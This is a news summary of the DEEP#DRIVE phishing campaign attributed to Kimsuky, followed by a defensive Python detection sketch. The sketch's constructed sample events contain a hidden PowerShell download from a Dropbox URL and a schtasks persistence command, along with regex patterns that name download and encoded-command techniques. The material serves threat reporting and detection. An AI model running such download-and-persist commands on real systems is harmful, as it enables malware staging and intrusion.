A recent phishing attack known as DEEP#DRIVE has emerged as a significant threat to entities in South Korea, with thousands of victims reported. Cybersecurity experts suspect the Kimsuky group, a North Korean hacking collective, is behind this extensive cyber espionage campaign aimed primarily at South Korean businesses, government agencies, and cryptocurrency users. Since its inception in September 2024, the attack has predominantly focused on espionage, seeking to extract sensitive information from its targets.
In an investigation released by Securonix, details underline the multifaceted nature of the DEEP#DRIVE campaign. The attackers have effectively utilized phishing tactics by crafting authentic-looking documents in Korean, such as work logs, insurance papers, and cryptocurrency-related files. This carefully planned approach has enabled them to infiltrate targeted systems, thereby amplifying the impact of their operations.
Securonix also highlighted one specific lure: a file titled 대차 및 파레트 that masqueraded as the Telegram.exe application and related to logistics operations. This lure contained critical logistics information, including product names and specifications, indicating a calculated effort to ensnare individuals in the logistics sector.
The attackers have distributed these deceptive lures in commonly trusted file formats like .hwp, .xlsx, and .pptx, hosted on reputable platforms such as Dropbox. By doing so, they have effectively avoided conventional security measures, allowing them to blend into normal user activity seamlessly.
According to researchers from Securonix, phishing was the core method of infection in this campaign, with collected samples and file names showing a strong correlation with typical phishing tactics. The reliance on phishing aligns closely with techniques outlined in the MITRE ATT&CK framework, particularly regarding initial access.
The attack also made extensive use of PowerShell scripts for payload delivery, reconnaissance to gather system data, and persistence via scheduled tasks. The chain typically began with a disguised .lnk file that launched malicious PowerShell scripts, which in turn downloaded further malicious payloads, including a .NET assembly concealed as legitimate software.
Although the final payload’s specifics remain unclear, its potential role as a backdoor indicates a sophisticated level of deception. Analysis of the attackers’ Dropbox account revealed numerous configuration files from compromised systems, underscoring the attackers’ focus on stealth and evasion. They also used obfuscation techniques, including meaningless variable names and junk assignments, to circumvent security tooling, highlighting their tactical acuity.
While the malicious infrastructure appeared to be transient, the tactics and techniques exhibited in the DEEP#DRIVE campaign closely resemble those employed by the Kimsuky group, which is notorious for its ongoing targeting of South Korea utilizing Dropbox-based strategies in past assaults. To mitigate risks associated with such attacks, Securonix advises proactive user education on phishing, enhanced monitoring of malware staging areas, and robust endpoint logging practices.
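As an added illustration of the chain described above (a .lnk-launched PowerShell, a download from a Dropbox staging area, then scheduled-task persistence) and of the endpoint-logging advice, here is a small detection sketch written for this summary; it is not code from Securonix or the report. The process-creation events, host names, URL and task names are constructed, and the regular expressions are assumptions about what such command lines look like.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events; hosts, times, URLs and
# task names are made up for this example and are not data from the report.
SAMPLE_EVENTS = [
    {"host": "WS01", "time": "2024-09-10T09:01:00", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": 'powershell.exe -w hidden -ep bypass -c "iwr https://www.dropbox.com/scl/fi/CONSTRUCTED/a.dat?dl=1 -OutFile $env:TEMP\\a.dat"'},
    {"host": "WS01", "time": "2024-09-10T09:02:30", "parent": "powershell.exe", "image": "schtasks.exe",
     "cmd": 'schtasks.exe /create /sc minute /mo 30 /tn UpdateSvc /tr "powershell -w hidden -f %TEMP%\\a.ps1"'},
    {"host": "WS02", "time": "2024-09-10T09:06:00", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden -c Start-Sleep 1"},
    {"host": "WS02", "time": "2024-09-10T09:40:00", "parent": "cmd.exe", "image": "schtasks.exe",
     "cmd": "schtasks.exe /create /tn Backup /tr backup.cmd /sc daily"},
]

# Indicators of the chain: a hidden/bypass PowerShell launch from Explorer (what a
# double-clicked .lnk produces), a download from a file-hosting staging area, and a
# scheduled-task creation on the same host shortly afterwards (assumed patterns).
SUSPICIOUS_PS = re.compile(r"(?i)(-w(indowstyle)?\s+hidden|-ep\s+bypass|-e(nc|ncodedcommand)?\s"
                           r"|\biwr\s|invoke-webrequest|downloadstring|downloadfile)")
STAGING_URL = re.compile(r"(?i)https?://[^\s\"']*dropbox\.com/")
PERSISTENCE = re.compile(r"(?i)(schtasks(\.exe)?\s+/create|register-scheduledtask)")

def is_lnk_style_launch(ev):
    """PowerShell started by Explorer with lure-typical arguments."""
    return (ev["image"].lower() == "powershell.exe" and ev["parent"].lower() == "explorer.exe"
            and SUSPICIOUS_PS.search(ev["cmd"]) is not None)

def find_chains(events, window_minutes=10):
    """Pair each suspicious launch with a scheduled-task creation on the same host
    inside the window; one finding per matched launch, with a staging-URL flag."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e["time"]):  # ISO-8601 strings sort correctly
        by_host.setdefault(ev["host"], []).append(ev)
    findings = []
    for host, evs in by_host.items():
        for i, ev in enumerate(evs):
            if not is_lnk_style_launch(ev):
                continue
            t0 = datetime.fromisoformat(ev["time"])
            for later in evs[i + 1:]:
                if datetime.fromisoformat(later["time"]) - t0 > timedelta(minutes=window_minutes):
                    break  # past the window: no persistence step followed this launch
                if PERSISTENCE.search(later["cmd"]):
                    findings.append({"host": host, "launch": ev["time"], "persist": later["time"],
                                     "staging_url": STAGING_URL.search(ev["cmd"]) is not None})
                    break
    return findings
```

On the constructed events only WS01 produces a finding; the hidden launch on WS02 is followed by a task creation too late to fall inside the ten-minute window.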
In summary, the DEEP#DRIVE campaign exemplifies a sophisticated and multi-layered approach to cyber espionage, leveraging social engineering tactics tailored for specific sectors. The focus on utilizing familiar platforms for distribution significantly increases the challenge for organizations striving to secure their digital environments against persistent threats.